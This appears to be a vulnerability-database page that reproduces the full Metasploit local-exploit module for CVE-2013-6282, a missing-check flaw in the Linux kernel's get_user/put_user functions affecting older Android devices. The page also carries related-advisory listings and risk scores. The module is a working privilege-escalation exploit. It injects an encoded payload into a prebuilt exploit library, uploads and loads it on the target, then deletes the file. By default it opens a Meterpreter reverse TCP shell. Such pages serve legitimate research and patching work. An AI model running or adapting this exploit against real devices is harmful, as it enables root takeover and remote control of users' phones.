Lucene search
Android get_user/put_user Exploit
🗓️ 13 Dec 2016 09:23:02Reported by fi01, cubeundcube, timwrType 
metasploit🔗 www.rapid7.com👁 73 Views
Android get_user/put_user Exploit in Linux Kernel before 3.5.
Show more
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Qualcomm missing checks put_user get_user | 6 Sep 201300:00 | – | android |
 | Linux ARM - Local Root Exploit | 1 Jul 201400:00 | – | seebug |
 | CVE-2013-6282 | 20 Nov 201313:19 | – | debiancve |
 | Memory corruption | 20 Nov 201313:19 | – | prion |
 | Android get_user/put_user Exploit | 26 Dec 201600:00 | – | zdt |
 | CVE-2013-6282 | 19 Nov 201315:00 | – | vulnrichment |
 | Linux Kernel 3.4.5 (Android 4.2.24.4 ARM) - Local Privilege Escalation | 11 Feb 201400:00 | – | exploitpack |
 | CVE-2013-6282 | 30 Oct 201510:07 | – | redhatcve |
 | CVE-2013-6282 | 20 Nov 201300:00 | – | ubuntucve |
 | Linux Kernel Improper Input Validation Vulnerability | 15 Sep 202200:00 | – | cisa_kev |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Common
def initialize(info = {})
super(
update_info(
info,
{
'Name' => "Android get_user/put_user Exploit",
'Description' => %q{
This module exploits a missing check in the get_user and put_user API functions
in the linux kernel before 3.5.5. The missing checks on these functions
allow an unprivileged user to read and write kernel memory.
This exploit first reads the kernel memory to identify the commit_creds and
ptmx_fops address, then uses the write primitive to execute shellcode as uid 0.
The exploit was first discovered in the wild in the vroot rooting application.
},
'License' => MSF_LICENSE,
'Author' => [
'fi01', # libget_user_exploit / libput_user_exploit
'cubeundcube', # kallsyms_in_memory
'timwr', # Metasploit module
],
'References' => [
[ 'CVE', '2013-6282' ],
[ 'URL', 'https://forum.xda-developers.com/t/root-share-vroot-1-6-0-3690-1-click-root-method-lenovo-a706-walkman-f800-etc.2434453/' ],
[ 'URL', 'https://github.com/fi01/libget_user_exploit' ],
[ 'URL', 'https://forum.xda-developers.com/t/root-saferoot-root-for-vruemj7-mk2-and-android-4-3.2565758/' ],
],
'DisclosureDate' => '2013-09-06',
'SessionTypes' => [ 'meterpreter' ],
"Platform" => [ "android", "linux" ],
'Targets' => [[ 'Automatic', {}]],
'Payload' => { 'Space' => 2048, },
'DefaultOptions' => {
'WfsDelay' => 120,
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp',
},
'DefaultTarget' => 0,
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
core_loadlib
stdapi_fs_delete_file
stdapi_fs_getwd
]
}
},
}
)
)
end
def exploit
local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-6282.so")
exploit_data = File.read(local_file, mode: 'rb')
space = payload_space
payload_encoded = payload.encoded
# Substitute the exploit shellcode with our own
exploit_data.gsub!("\x90" * 4 + "\x00" * (space - 4), payload_encoded + "\x90" * (payload_encoded.length - space))
workingdir = session.fs.dir.getwd
remote_file = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
write_file(remote_file, exploit_data)
print_status("Loading exploit library #{remote_file}")
session.core.load_library(
'LibraryFilePath' => local_file,
'TargetFilePath' => remote_file,
'UploadLibrary' => false,
'Extension' => false,
'SaveToDisk' => false
)
print_status("Loaded library #{remote_file}, deleting")
session.fs.file.rm(remote_file)
print_status("Waiting #{datastore['WfsDelay']} seconds for payload")
end
end
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo13 Dec 2016 09:02Current
6.5Medium risk
Vulners AI Score6.5
CVSS27.2
CVSS38.8
EPSS0.43157